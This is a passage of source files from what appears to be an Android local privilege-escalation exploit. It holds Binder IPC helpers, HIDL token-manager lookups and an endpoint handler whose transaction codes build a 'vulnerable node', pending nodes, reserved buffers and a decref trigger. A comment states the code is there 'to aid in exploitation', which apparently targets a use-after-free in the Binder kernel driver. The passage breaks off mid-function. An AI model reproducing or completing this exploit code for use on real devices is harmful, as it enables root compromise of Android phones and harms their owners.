fd) 805 | { 806 | struct binder_fd_object *obj; 807 | 808 | obj = bio_alloc_obj(bio); 809 | if (!obj) 810 | return; 811 | 812 | obj->hdr.type = BINDER_TYPE_FD; 813 | obj->fd = fd; 814 | obj->cookie = 0; 815 | } 816 | 817 | void bio_put_ref(struct binder_io *bio, uint32_t handle) 818 | { 819 | struct flat_binder_object *obj; 820 | 821 | if (handle) 822 | obj = bio_alloc_obj(bio); 823 | else 824 | obj = bio_alloc(bio, sizeof(*obj)); 825 | 826 | if (!obj) 827 | return; 828 | 829 | obj->flags = 0x7f | FLAT_BINDER_FLAG_ACCEPTS_FDS; 830 | obj->hdr.type = BINDER_TYPE_HANDLE; 831 | obj->handle = handle; 832 | obj->cookie = 0; 833 | } 834 | 835 | 836 | 837 | 838 | void bio_put_string16(struct binder_io *bio, const uint16_t *str) 839 | { 840 | size_t len; 841 | uint16_t *ptr; 842 | 843 | if (!str) { 844 | bio_put_uint32(bio, 0xffffffff); 845 | return; 846 | } 847 | 848 | len = 0; 849 | while (str[len]) len++; 850 | 851 | if (len >= (MAX_BIO_SIZE / sizeof(uint16_t))) { 852 | bio_put_uint32(bio, 0xffffffff); 853 | return; 854 | } 855 | 856 | /* Note: The payload will carry 32bit size instead of size_t */ 857 | bio_put_uint32(bio, (uint32_t) len); 858 | len = (len + 1) * sizeof(uint16_t); 859 | ptr = bio_alloc(bio, len); 860 | if (ptr) 861 | memcpy(ptr, str, len); 862 | } 863 | 864 | void bio_put_string16_x(struct binder_io *bio, const char *_str) 865 | { 866 | unsigned char *str = (unsigned char*) _str; 867 | size_t len; 868 | uint16_t *ptr; 869 | 870 | if (!str) { 871 | bio_put_uint32(bio, 0xffffffff); 872 | return; 873 | } 874 | 875 | len = strlen(_str); 876 | 877 | if (len >= (MAX_BIO_SIZE / sizeof(uint16_t))) { 878 | bio_put_uint32(bio, 0xffffffff); 879 | return; 880 | } 881 | 882 | /* Note: The payload will carry 32bit size instead of size_t */ 883 | bio_put_uint32(bio, len); 884 | ptr = bio_alloc(bio, (len + 1) * sizeof(uint16_t)); 885 | if (!ptr) 886 | return; 887 | 888 | while (*str) 889 | *ptr++ = *str++; 890 | *ptr++ = 0; 891 | } 892 | 893 | static void *bio_get(struct binder_io *bio, size_t size) 894 | { 895 | size = (size + 3) & (~3); 896 | 897 | if (bio->data_avail < size){ 898 | bio->data_avail = 0; 899 | bio->flags |= BIO_F_OVERFLOW; 900 | return NULL; 901 | } else { 902 | void *ptr = bio->data; 903 | bio->data += size; 904 | bio->data_avail -= size; 905 | return ptr; 906 | } 907 | } 908 | 909 | uint32_t bio_get_uint32(struct binder_io *bio) 910 | { 911 | uint32_t *ptr = bio_get(bio, sizeof(*ptr)); 912 | return ptr ? *ptr : 0; 913 | } 914 | 915 | uint16_t *bio_get_string16(struct binder_io *bio, size_t *sz) 916 | { 917 | size_t len; 918 | 919 | /* Note: The payload will carry 32bit size instead of size_t */ 920 | len = (size_t) bio_get_uint32(bio); 921 | if (sz) 922 | *sz = len; 923 | return bio_get(bio, (len + 1) * sizeof(uint16_t)); 924 | } 925 | 926 | static struct flat_binder_object *_bio_get_obj(struct binder_io *bio) 927 | { 928 | size_t n; 929 | size_t off = bio->data - bio->data0; 930 | 931 | /* TODO: be smarter about this? */ 932 | for (n = 0; n < bio->offs_avail; n++) { 933 | if (bio->offs[n] == off) 934 | return bio_get(bio, sizeof(struct flat_binder_object)); 935 | } 936 | 937 | bio->data_avail = 0; 938 | bio->flags |= BIO_F_OVERFLOW; 939 | return NULL; 940 | } 941 | 942 | uint32_t bio_get_ref(struct binder_io *bio) 943 | { 944 | struct flat_binder_object *obj; 945 | 946 | obj = _bio_get_obj(bio); 947 | // log_info("[*] Ref object at %p\n", obj); 948 | 949 | if (!obj) 950 | return 0; 951 | 952 | if (obj->hdr.type == BINDER_TYPE_HANDLE) { 953 | return obj->handle; 954 | } 955 | 956 | /* I added that for my tests, but I shouldn't be needed on Android. */ 957 | if (obj->hdr.type == BINDER_TYPE_BINDER) { 958 | return obj->handle; 959 | } 960 | 961 | return 0; 962 | } 963 | 964 | /* This is custom code added to the binder API, to aid in exploitation. */ 965 | int binder_read(int fd, void *buffer, size_t size) 966 | { 967 | int res; 968 | struct binder_write_read bwr; 969 | 970 | bzero(&bwr, sizeof(bwr)); 971 | 972 | bwr.read_buffer = buffer; 973 | bwr.read_size = size; 974 | 975 | res = ioctl(fd, BINDER_WRITE_READ, &bwr); 976 | 977 | if (res < 0) { 978 | log_err("binder_read() -> %s\n", strerror(errno)); 979 | return res; 980 | } 981 | 982 | 983 | return bwr.read_consumed; 984 | } 985 | 986 | void *make_transaction(void *buffer, bool one_way, uint32_t handle, void *opaque, size_t opaque_size, void *offsets, size_t offsets_size) 987 | { 988 | struct binder_transaction_data *tr; 989 | *(uint32_t *)buffer = BC_TRANSACTION; 990 | tr = (struct binder_transaction_data *)(buffer + sizeof(uint32_t)); 991 | 992 | tr->target.handle = handle; 993 | //tr->flags = TF_ONE_WAY; 994 | tr->flags = one_way ? TF_ONE_WAY : 0; 995 | /* We do accept FDS. */ 996 | tr->flags |= TF_ACCEPT_FDS; 997 | tr->data.ptr.buffer = opaque; 998 | tr->data_size = opaque_size; 999 | tr->data.ptr.offsets = offsets; 1000 | tr->offsets_size = offsets_size; 1001 | 1002 | 1003 | /* Return a pointer to the location for the next command. */ 1004 | return (void *)(tr + 1); 1005 | } 1006 | 1007 | void *make_reply(void *buffer, bool one_way, uint32_t handle, void *opaque, size_t opaque_size, void *offsets, size_t offsets_size) 1008 | { 1009 | struct binder_transaction_data *tr; 1010 | *(uint32_t *)buffer = BC_REPLY; 1011 | tr = (struct binder_transaction_data *)(buffer + sizeof(uint32_t)); 1012 | 1013 | tr->target.handle = handle; 1014 | //tr->flags = TF_ONE_WAY; 1015 | tr->flags = one_way ? TF_ONE_WAY : 0; 1016 | tr->data.ptr.buffer = opaque; 1017 | tr->data_size = opaque_size; 1018 | tr->data.ptr.offsets = offsets; 1019 | tr->offsets_size = offsets_size; 1020 | 1021 | 1022 | /* Return a pointer to the location for the next command. */ 1023 | return (void *)(tr + 1); 1024 | } 1025 | 1026 | 1027 | int binder_transaction(struct binder_state *bs, bool one_way, uint32_t handle, void *opaque, size_t opaque_size, void *offsets, size_t offsets_size) 1028 | { 1029 | struct binder_transaction_data *tr; 1030 | uint8_t buffer[sizeof(uint32_t) + sizeof(*tr)]; 1031 | uint32_t remaining = 0; 1032 | uint32_t consumed = 0; 1033 | 1034 | make_transaction(buffer, one_way, handle, opaque, opaque_size, offsets, offsets_size); 1035 | 1036 | /* Sending the transaction. */ 1037 | int res = binder_write(bs, buffer, sizeof(buffer)); 1038 | if (res < 0) 1039 | return res; 1040 | #if 0 1041 | uint32_t r[32]; 1042 | int r2; 1043 | r2 = binder_read(bs->fd, r, 32 * sizeof(uint32_t)); 1044 | /* TODO: Check results. */ 1045 | int i; 1046 | #endif 1047 | 1048 | 1049 | return res; 1050 | } 1051 | 1052 | int binder_reply(struct binder_state *bs, uint32_t handle, void *opaque, size_t opaque_size, void *offsets, size_t offsets_size) 1053 | { 1054 | void *buffer; 1055 | struct binder_transaction_data *tr; 1056 | size_t size = sizeof(uint32_t) + sizeof(*tr); 1057 | 1058 | 1059 | buffer = malloc(size); 1060 | if (buffer == NULL) { 1061 | log_err("[-] binder_transaction. Failed to allocate memory.\n"); 1062 | return -1; 1063 | } 1064 | 1065 | bzero(buffer, size); 1066 | 1067 | 1068 | make_transaction(buffer, false, handle, opaque, opaque_size, offsets, offsets_size); 1069 | 1070 | *(uint32_t *)(buffer) = BC_REPLY; 1071 | 1072 | /* Sending the transaction. */ 1073 | int res = binder_write(bs, buffer, size); 1074 | /* TODO: Check result. */ 1075 | 1076 | uint32_t r[32]; 1077 | int r2; 1078 | r2 = binder_read(bs->fd, r, 32 * sizeof(uint32_t)); 1079 | /* TODO: Check results. */ 1080 | int i; 1081 | 1082 | free(buffer); 1083 | 1084 | return res; 1085 | } 1086 | 1087 | uint32_t binder_read_next(struct binder_state *bs, void *data, uint32_t *remaining, uint32_t *consumed) 1088 | { 1089 | int res; 1090 | uint32_t cmd; 1091 | void *ptr, *end; 1092 | 1093 | // log_info("remaining: %x\nconsumed: %x\n", *remaining, *consumed); 1094 | 1095 | if (!*remaining) { 1096 | /* Read the first 8 bytes. */ 1097 | // log_info("before read\n"); 1098 | res = binder_read(bs->fd, data, 32 * sizeof(uint32_t)); 1099 | // log_info("after read: %x\n", res); 1100 | if (res < 0) { 1101 | log_err("binder_read_next: %s\n", strerror(errno)); 1102 | return (uint32_t)-1; 1103 | } 1104 | 1105 | *remaining = res; 1106 | *consumed = 0; 1107 | } 1108 | 1109 | 1110 | ptr = data; 1111 | ptr += *consumed; 1112 | end = ptr + *remaining; 1113 | 1114 | cmd = *(uint32_t *)ptr; 1115 | 1116 | *consumed += sizeof(uint32_t); 1117 | *remaining -= sizeof(uint32_t); 1118 | ptr += sizeof(uint32_t); 1119 | 1120 | //log_info("cmd: %s\n", cmd_name(cmd)); 1121 | switch (cmd) { 1122 | case BR_NOOP: 1123 | res = 0; 1124 | break; 1125 | 1126 | case BR_RELEASE: 1127 | case BR_DECREFS: 1128 | case BR_ACQUIRE: 1129 | case BR_INCREFS: 1130 | res =2 * sizeof(uint64_t); 1131 | *consumed += res; 1132 | *remaining -= res; 1133 | break; 1134 | case BR_REPLY: 1135 | case BR_TRANSACTION: 1136 | res = sizeof(struct binder_transaction_data); 1137 | *consumed += res; 1138 | *remaining -= res; 1139 | break; 1140 | case BR_FAILED_REPLY: 1141 | case BR_TRANSACTION_COMPLETE: 1142 | res = 0; 1143 | break; 1144 | default: 1145 | log_err("Unhandle command %s\n", cmd_name(cmd)); 1146 | exit(1); 1147 | return (uint32_t)-1; 1148 | 1149 | } 1150 | 1151 | /* Update ptr and size */ 1152 | return cmd; 1153 | } 1154 | 1155 | uint32_t binder_read_next_dbg(struct binder_state *bs, void *data, uint32_t *remaining, uint32_t *consumed) 1156 | { 1157 | int res; 1158 | uint32_t cmd; 1159 | void *ptr, *end; 1160 | 1161 | log_info("remaining: %x\nconsumed: %x\n", *remaining, *consumed); 1162 | 1163 | if (!*remaining) { 1164 | /* Read the first 8 bytes. */ 1165 | // log_info("before read\n"); 1166 | res = binder_read(bs->fd, data, 32 * sizeof(uint32_t)); 1167 | // log_info("after read: %x\n", res); 1168 | if (res < 0) { 1169 | log_err("binder_read_next: %s\n", strerror(errno)); 1170 | return (uint32_t)-1; 1171 | } 1172 | 1173 | *remaining = res; 1174 | *consumed = 0; 1175 | } 1176 | 1177 | 1178 | ptr = data; 1179 | ptr += *consumed; 1180 | end = ptr + *remaining; 1181 | 1182 | cmd = *(uint32_t *)ptr; 1183 | 1184 | *consumed += sizeof(uint32_t); 1185 | *remaining -= sizeof(uint32_t); 1186 | ptr += sizeof(uint32_t); 1187 | 1188 | log_info("cmd: %s\n", cmd_name(cmd)); 1189 | switch (cmd) { 1190 | case BR_NOOP: 1191 | res = 0; 1192 | break; 1193 | 1194 | case BR_RELEASE: 1195 | case BR_DECREFS: 1196 | case BR_ACQUIRE: 1197 | case BR_INCREFS: 1198 | log_info("ptr: 0x%llx\n", *(uint64_t *)(ptr)); 1199 | log_info("cookie: 0x%llx\n", *(uint64_t *)(ptr + 0x8)); 1200 | res =2 * sizeof(uint64_t); 1201 | *consumed += res; 1202 | *remaining -= res; 1203 | break; 1204 | case BR_REPLY: 1205 | case BR_TRANSACTION: 1206 | res = sizeof(struct binder_transaction_data); 1207 | *consumed += res; 1208 | *remaining -= res; 1209 | break; 1210 | case BR_FAILED_REPLY: 1211 | case BR_TRANSACTION_COMPLETE: 1212 | res = 0; 1213 | break; 1214 | default: 1215 | log_err("Unhandle command %s\n", cmd_name(cmd)); 1216 | exit(1); 1217 | return (uint32_t)-1; 1218 | 1219 | } 1220 | 1221 | /* Update ptr and size */ 1222 | return cmd; 1223 | } 1224 | 1225 | -------------------------------------------------------------------------------- /lpe/src/binder_lookup.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include "binder.h" 9 | #include "binder_lookup.h" 10 | #include "log.h" 11 | 12 | #define HWSERVICE_MANAGER "android.hidl.manager@1.0::IServiceManager" 13 | #define TOKEN_MANAGER "android.hidl.token@1.0::ITokenManager" 14 | 15 | 16 | typedef void * hidl_pointer; 17 | 18 | struct hidl_handle { 19 | hidl_pointer phandle; 20 | bool owns_handle; 21 | }; 22 | 23 | typedef struct hidl_string { 24 | hidl_pointer buffer; 25 | uint32_t size; 26 | bool owns_buffer; 27 | } hidl_string; 28 | 29 | typedef struct hidl_vec { 30 | hidl_pointer buffer; 31 | uint32_t size; 32 | bool owns_buffer; 33 | } hidl_vec; 34 | 35 | typedef struct service_list { 36 | struct service_list *next; 37 | const char *service_name; 38 | hidl_vec *token; 39 | } service_list_t; 40 | 41 | static service_list_t *services = NULL; 42 | 43 | 44 | bool add_service_token(const char *service, hidl_vec *token) 45 | { 46 | service_list_t *entry, *tmp; 47 | 48 | entry = calloc(1, sizeof(*entry)); 49 | if (!entry) 50 | return false; 51 | 52 | /* Insert. */ 53 | tmp = services; 54 | 55 | entry->service_name = strdup(service); 56 | entry->token = token; 57 | entry->next = tmp; 58 | 59 | if (!tmp) { 60 | services = entry; 61 | } else { 62 | entry->next = services; 63 | services = entry; 64 | } 65 | 66 | return true; 67 | } 68 | 69 | hidl_vec *get_service_token(const char *service) 70 | { 71 | service_list_t *entry = services; 72 | 73 | while (entry) { 74 | if (!strcmp(entry->service_name, service)) 75 | return entry->token; 76 | 77 | entry = entry->next; 78 | } 79 | 80 | return NULL; 81 | } 82 | 83 | /* Create wrapper for hidl_strings. */ 84 | hidl_string *hidl_string_new(const char *str) 85 | { 86 | size_t len; 87 | hidl_string *hstr = calloc(1, sizeof(*hstr)); 88 | if (!hstr) 89 | return NULL; 90 | 91 | len = strlen(str); 92 | 93 | hstr->buffer = (hidl_pointer)malloc(len + 1); 94 | if (!hstr->buffer) { 95 | free(hstr); 96 | return NULL; 97 | } 98 | 99 | strcpy(hstr->buffer, str); 100 | hstr->size = len; 101 | 102 | return hstr; 103 | } 104 | 105 | uint64_t find_hwservice(struct binder_state *bs, const char *service) 106 | { 107 | uint8_t txn_data[0x1000]; 108 | uint8_t reply_data[0x1000]; 109 | uint8_t *ptr = txn_data; 110 | uint64_t offsets[0x10]; 111 | uint64_t *offs = offsets; 112 | struct binder_write_read bwr; 113 | uint32_t buffers_size = 0; 114 | 115 | struct hidl_string *name; 116 | struct hidl_string *instance; 117 | uint64_t name_parent_off = 0; 118 | uint64_t instance_parent_off = 0; 119 | 120 | struct binder_buffer_object *bbo = NULL; 121 | 122 | struct { 123 | uint32_t cmd; 124 | struct binder_transaction_data txn; 125 | binder_size_t buffers_size; 126 | } __attribute__((packed)) writebuf; 127 | 128 | 129 | memset(txn_data, 0, 0x1000); 130 | bzero(&bwr, sizeof(bwr)); 131 | 132 | 133 | name = hidl_string_new(service); 134 | instance = hidl_string_new("default"); 135 | 136 | ptr = txn_data; 137 | 138 | /* Write the interface token first, as a classic C string, while taking 139 | * care of padding to 32bits. 140 | */ 141 | memcpy(ptr, HWSERVICE_MANAGER, sizeof(HWSERVICE_MANAGER) + 1); 142 | ptr += sizeof(HWSERVICE_MANAGER) + 1; 143 | 144 | /* Align on 32bits. */ 145 | while (((uint64_t)ptr) % sizeof(uint32_t)) 146 | ptr++; 147 | 148 | /* write the hidl_string. */ 149 | bbo = (struct binder_buffer_object *)ptr; 150 | bbo[0].hdr.type = BINDER_TYPE_PTR; 151 | bbo[0].buffer = name; 152 | bbo[0].length = sizeof(struct hidl_string); 153 | bbo[0].flags = 0; 154 | bbo[0].parent = 0; 155 | bbo[0].parent_offset = 0; 156 | name_parent_off = (uint64_t)((uint8_t*)bbo - txn_data); 157 | buffers_size += bbo[0].length; 158 | *(offs++) = name_parent_off; 159 | 160 | ptr = &bbo[1]; 161 | 162 | /* Embed the pointer. */ 163 | bbo[1].hdr.type = BINDER_TYPE_PTR; 164 | bbo[1].buffer = name->buffer; 165 | bbo[1].length = name->size + 1; 166 | bbo[1].flags = 1; //HAS_PARENT; 167 | //bbo[1].parent = name_parent_off; 168 | bbo[1].parent = 0; 169 | bbo[1].parent_offset = 0; 170 | buffers_size += bbo[1].length; 171 | *(offs++) = (uint64_t)((uint8_t*)&bbo[1] - txn_data); 172 | 173 | ptr = &bbo[2]; 174 | 175 | bbo[2].hdr.type = BINDER_TYPE_PTR; 176 | bbo[2].buffer = instance; 177 | bbo[2].length = sizeof(struct hidl_string); 178 | bbo[2].flags = 0; 179 | instance_parent_off = (uint64_t)((uint8_t *)&bbo[2] - txn_data); 180 | *(offs++) = (uint64_t)((uint8_t*)&bbo[2] - txn_data); 181 | buffers_size += bbo[2].length; 182 | 183 | /* Embed the pointer. */ 184 | bbo[3].hdr.type = BINDER_TYPE_PTR; 185 | bbo[3].buffer = instance->buffer; 186 | bbo[3].length = instance->size + 1; 187 | bbo[3].flags = 1; //HAS_PARENT; 188 | //bbo[3].parent = instance_parent_off; 189 | bbo[3].parent = 2; 190 | bbo[3].parent_offset = 0; 191 | *(offs++) = (uint64_t)((uint8_t*)&bbo[3] - txn_data); 192 | buffers_size += bbo[3].length; 193 | 194 | ptr = &bbo[4]; 195 | 196 | /* Send the BINDER_TRANSACTION_SG. */ 197 | writebuf.cmd = BC_TRANSACTION_SG; 198 | writebuf.txn.target.handle = 0; 199 | writebuf.txn.code = 1; 200 | writebuf.txn.flags = 0; 201 | writebuf.txn.data_size = (uint64_t)ptr - (uint64_t)txn_data; 202 | writebuf.txn.offsets_size = (uint64_t)offs - (uint64_t)offsets; 203 | writebuf.txn.data.ptr.buffer = txn_data; 204 | writebuf.txn.data.ptr.offsets = offsets; 205 | 206 | /* Align buffers size. */ 207 | while (buffers_size % 8) 208 | buffers_size++; 209 | writebuf.buffers_size = buffers_size; 210 | 211 | bwr.write_size = sizeof(writebuf); 212 | bwr.write_consumed = 0; 213 | bwr.write_buffer = &writebuf; 214 | bwr.read_size = 0; 215 | bwr.read_consumed = 0; 216 | bwr.read_buffer = 0; 217 | 218 | /* Send query. */ 219 | ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 220 | uint32_t remaining, consumed; 221 | uint32_t rdata[32]; 222 | remaining = 0, consumed = 0; 223 | 224 | while (binder_read_next(bs, rdata, &remaining, &consumed) != BR_REPLY); 225 | 226 | struct binder_transaction_data *tr = (struct binder_transaction *)((uint8_t*)rdata + consumed - sizeof(*tr)); 227 | 228 | struct flat_binder_object *fbo = (struct flat_binder_object *)(tr->data.ptr.buffer + 4); 229 | 230 | /* Acquire the ref. */ 231 | binder_acquire(bs, fbo->handle); 232 | 233 | /* Free the transaction. */ 234 | binder_free_buffer(bs, tr->data.ptr.buffer); 235 | 236 | return fbo->handle; 237 | } 238 | 239 | hidl_vec * create_token(struct binder_state *bs, uint64_t tm_handle, uint64_t my_handle) 240 | { 241 | uint8_t txn_data[0x1000]; 242 | uint8_t reply_data[0x1000]; 243 | uint8_t *ptr = txn_data; 244 | uint64_t offsets[0x10]; 245 | uint64_t *offs = offsets; 246 | struct binder_write_read bwr; 247 | uint32_t buffers_size = 0; 248 | 249 | struct hidl_string *name; 250 | struct hidl_string *instance; 251 | uint64_t name_parent_off = 0; 252 | uint64_t instance_parent_off = 0; 253 | 254 | struct binder_buffer_object *bbo = NULL; 255 | 256 | struct { 257 | uint32_t cmd; 258 | struct binder_transaction_data txn; 259 | binder_size_t buffers_size; 260 | } __attribute__((packed)) writebuf; 261 | 262 | 263 | memset(txn_data, 0, 0x1000); 264 | bzero(&bwr, sizeof(bwr)); 265 | 266 | 267 | ptr = txn_data; 268 | 269 | /* Write the interface token first, as a classic C string, while taking 270 | * care of padding to 32bits. 271 | */ 272 | memcpy(ptr, TOKEN_MANAGER, sizeof(TOKEN_MANAGER) + 1); 273 | ptr += sizeof(TOKEN_MANAGER) + 1; 274 | 275 | /* Align on 32bits. */ 276 | while (((uint64_t)ptr) % sizeof(uint32_t)) 277 | ptr++; 278 | 279 | /* Add our strong binder. */ 280 | struct flat_binder_object *fbo = (struct flat_binder_object *)ptr; 281 | fbo->hdr.type = BINDER_TYPE_BINDER; 282 | fbo->binder = my_handle; 283 | fbo->cookie = 0; 284 | *(offs++) = (uint64_t)fbo - (uint64_t)txn_data; 285 | 286 | ptr = &fbo[1]; 287 | 288 | /* Send the BINDER_TRANSACTION_SG. */ 289 | writebuf.cmd = BC_TRANSACTION_SG; 290 | writebuf.txn.target.handle = tm_handle; 291 | writebuf.txn.code = 1; //create_token 292 | writebuf.txn.flags = 0; 293 | writebuf.txn.data_size = (uint64_t)ptr - (uint64_t)txn_data; 294 | writebuf.txn.offsets_size = (uint64_t)offs - (uint64_t)offsets; 295 | writebuf.txn.data.ptr.buffer = txn_data; 296 | writebuf.txn.data.ptr.offsets = offsets; 297 | 298 | /* Align buffers size. */ 299 | while (buffers_size % 8) 300 | buffers_size++; 301 | writebuf.buffers_size = buffers_size; 302 | 303 | bwr.write_size = sizeof(writebuf); 304 | bwr.write_consumed = 0; 305 | bwr.write_buffer = &writebuf; 306 | bwr.read_size = 0; 307 | bwr.read_consumed = 0; 308 | bwr.read_buffer = 0; 309 | 310 | /* Send query. */ 311 | ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 312 | uint32_t remaining, consumed; 313 | uint32_t rdata[32]; 314 | remaining = 0, consumed = 0; 315 | 316 | while (binder_read_next(bs, rdata, &remaining, &consumed) != BR_REPLY); 317 | 318 | struct binder_transaction_data *tr = (struct binder_transaction *)((uint8_t*)rdata + consumed - sizeof(*tr)); 319 | 320 | /* Okay, build the HIDL vec. */ 321 | bbo = (struct binder_buffer_object *)(tr->data.ptr.buffer + 4); 322 | hidl_vec *vec = calloc(1, sizeof(*vec)); 323 | 324 | //Should check for BINDER_TYPE_PTR 325 | 326 | memcpy(vec, bbo->buffer, sizeof(*vec)); 327 | 328 | /* Allocate the vec data. */ 329 | void *data = malloc(vec->size); 330 | memcpy(data, vec->buffer, vec->size); 331 | 332 | /* replace the pointers. */ 333 | vec->buffer = data; 334 | 335 | 336 | binder_free_buffer(bs, tr->data.ptr.buffer); 337 | 338 | /* return the token. */ 339 | return vec; 340 | } 341 | 342 | uint32_t get_by_token(struct binder_state *bs, uint64_t tm, hidl_vec *token) 343 | { 344 | uint8_t txn_data[0x1000]; 345 | uint8_t reply_data[0x1000]; 346 | uint8_t *ptr = txn_data; 347 | uint64_t offsets[0x10]; 348 | uint64_t *offs = offsets; 349 | struct binder_write_read bwr; 350 | uint32_t buffers_size = 0; 351 | 352 | struct hidl_string *name; 353 | struct hidl_string *instance; 354 | uint64_t name_parent_off = 0; 355 | uint64_t instance_parent_off = 0; 356 | 357 | struct binder_buffer_object *bbo = NULL; 358 | 359 | struct { 360 | uint32_t cmd; 361 | struct binder_transaction_data txn; 362 | binder_size_t buffers_size; 363 | } __attribute__((packed)) writebuf; 364 | 365 | 366 | memset(txn_data, 0, 0x1000); 367 | bzero(&bwr, sizeof(bwr)); 368 | 369 | 370 | ptr = txn_data; 371 | 372 | /* Write the interface token first, as a classic C string, while taking 373 | * care of padding to 32bits. 374 | */ 375 | memcpy(ptr, TOKEN_MANAGER, sizeof(TOKEN_MANAGER) + 1); 376 | ptr += sizeof(TOKEN_MANAGER) + 1; 377 | 378 | /* Align on 32bits. */ 379 | while (((uint64_t)ptr) % sizeof(uint32_t)) 380 | ptr++; 381 | 382 | 383 | /* write the hidl_vec. */ 384 | bbo = (struct binder_buffer_object *)ptr; 385 | bbo[0].hdr.type = BINDER_TYPE_PTR; 386 | bbo[0].buffer = token; 387 | bbo[0].length = sizeof(*token); 388 | bbo[0].flags = 0; 389 | bbo[0].parent = 0; 390 | bbo[0].parent_offset = 0; 391 | name_parent_off = (uint64_t)((uint8_t*)bbo - txn_data); 392 | buffers_size += bbo[0].length; 393 | *(offs++) = name_parent_off; 394 | 395 | ptr = &bbo[1]; 396 | 397 | /* Embed the pointer. */ 398 | bbo[1].hdr.type = BINDER_TYPE_PTR; 399 | bbo[1].buffer = token->buffer; 400 | bbo[1].length = token->size; 401 | bbo[1].flags = 1; //HAS_PARENT; 402 | //bbo[1].parent = name_parent_off; 403 | bbo[1].parent = 0; 404 | bbo[1].parent_offset = 0; 405 | buffers_size += bbo[1].length; 406 | *(offs++) = (uint64_t)((uint8_t*)&bbo[1] - txn_data); 407 | 408 | ptr = &bbo[2]; 409 | 410 | 411 | /* Send the BINDER_TRANSACTION_SG. */ 412 | writebuf.cmd = BC_TRANSACTION_SG; 413 | writebuf.txn.target.handle = tm; 414 | writebuf.txn.code = 3; //get_by_token 415 | writebuf.txn.flags = 0; 416 | writebuf.txn.data_size = (uint64_t)ptr - (uint64_t)txn_data; 417 | writebuf.txn.offsets_size = (uint64_t)offs - (uint64_t)offsets; 418 | writebuf.txn.data.ptr.buffer = txn_data; 419 | writebuf.txn.data.ptr.offsets = offsets; 420 | 421 | /* Align buffers size. */ 422 | while (buffers_size % 8) 423 | buffers_size++; 424 | writebuf.buffers_size = buffers_size; 425 | 426 | bwr.write_size = sizeof(writebuf); 427 | bwr.write_consumed = 0; 428 | bwr.write_buffer = &writebuf; 429 | bwr.read_size = 0; 430 | bwr.read_consumed = 0; 431 | bwr.read_buffer = 0; 432 | 433 | /* Send query. */ 434 | ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 435 | uint32_t remaining, consumed; 436 | uint32_t rdata[32]; 437 | remaining = 0, consumed = 0; 438 | 439 | while (binder_read_next(bs, rdata, &remaining, &consumed) != BR_REPLY); 440 | 441 | struct binder_transaction_data *tr = (struct binder_transaction *)((uint8_t*)rdata + consumed - sizeof(*tr)); 442 | 443 | struct flat_binder_object *fbo = (struct flat_binder_object *)(tr->data.ptr.buffer + 4); 444 | 445 | binder_acquire(bs, fbo->handle); 446 | 447 | return fbo->handle; 448 | } 449 | 450 | uint32_t grab_handle(struct binder_state *bs, char *name) 451 | { 452 | 453 | uint64_t tm = find_hwservice(bs, TOKEN_MANAGER); 454 | 455 | hidl_vec *token = get_service_token(name); 456 | if (!token) 457 | return 0; 458 | 459 | uint32_t handle = get_by_token(bs, tm, token); 460 | 461 | binder_release(bs, tm); 462 | return handle; 463 | } 464 | 465 | int publish_handle(struct binder_state *bs, uint64_t handle, char *name) 466 | { 467 | uint64_t tm = find_hwservice(bs, TOKEN_MANAGER); 468 | 469 | hidl_vec *vec = create_token(bs, tm, handle); 470 | if (!vec) 471 | return 0; 472 | 473 | /* Make the association. */ 474 | add_service_token(name, vec); 475 | 476 | 477 | /* release the reference. */ 478 | binder_release(bs, tm); 479 | 480 | return 1; 481 | } 482 | 483 | -------------------------------------------------------------------------------- /lpe/src/endpoint.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #include "binder.h" 14 | #include "handle.h" 15 | #include "log.h" 16 | #include "endpoint.h" 17 | #include "pending_node.h" 18 | 19 | 20 | static struct endpoint_handle *endpoints = NULL; 21 | 22 | static int endpoint_transaction_handler(struct endpoint_handle *handle, struct binder_transaction_data *tr, struct binder_io *msg, struct binder_io *reply) 23 | { 24 | 25 | int res = 1; 26 | struct binder_state *bs = handle->bs; 27 | pthread_t th; 28 | 29 | switch (tr->code) { 30 | case GET_VMA_START: 31 | /* Do it in 2 times. */ 32 | bio_put_uint32(reply, (uint32_t)bs->mapped); 33 | bio_put_uint32(reply, (uint32_t)(((uint64_t)(bs->mapped)>>32))); 34 | res = 0; 35 | break; 36 | case EXCHANGE_HANDLES: 37 | handle->client_handle = bio_get_ref(msg); 38 | /* Acquire the handle. */ 39 | binder_acquire(bs, handle->client_handle); 40 | 41 | /* Create the vulnerable node in the process. */ 42 | bio_put_obj(reply, bs->mapped + 0xe8); 43 | uint64_t node2 = bs->mapped + 0xe8; 44 | node2 = node2 & 0xFFFFFFFF; 45 | node2 = node2 << 32; 46 | node2 += 0x42; 47 | 48 | bio_put_obj(reply, node2); 49 | res = 0; 50 | break; 51 | case ADD_PENDING_NODE: 52 | add_pending_node(bs, handle->client_handle); 53 | //uaf_node_th = add_pending_node(bs, client_handle); 54 | //log_info("uaf_node_th: %p\n", uaf_node_th); 55 | res = 0; 56 | break; 57 | case TERMINATE_PENDING_NODE: 58 | th = bio_get_uint32(msg) + (((uint64_t)bio_get_uint32(msg)) << 32); 59 | terminate_pending_node(th); 60 | res = 0; 61 | break; 62 | case RESERVE_BUFFER: 63 | if (handle->reserved_buffer) { 64 | log_err("A buffer is already reserved. Free it if you want to reserve another one.\n"); 65 | res = -1; 66 | break; 67 | } 68 | else { 69 | handle->reserved_buffer = tr->data.ptr.buffer; 70 | res = 42; /* Instruct the calling function to skip freeing the buffer. */ 71 | } 72 | break; 73 | case FREE_RESERVED_BUFFER: 74 | if (handle->reserved_buffer) { 75 | binder_free_buffer(bs, handle->reserved_buffer); 76 | handle->reserved_buffer = 0; 77 | } 78 | res = 0; 79 | break; 80 | case TRIGGER_DECREF: 81 | res = 0; 82 | break; 83 | default: 84 | log_err("[-] Unknown transaction code.\n"); 85 | break; 86 | } 87 | 88 | 89 | return res; 90 | 91 | } 92 | 93 | static struct endpoint_handle *_lookup_by_name(const char *name) 94 | { 95 | struct endpoint_handle *handle = endpoints; 96 | 97 | while (handle) { 98 | if (!strcmp(name, handle->name)) 99 | return handle; 100 | handle = handle->next; 101 | } 102 | 103 | return NULL; 104 | } 105 | 106 | static struct endpoint_handle *_lookup_by_pid(pid_t pid) 107 | { 108 | struct endpoint_handle 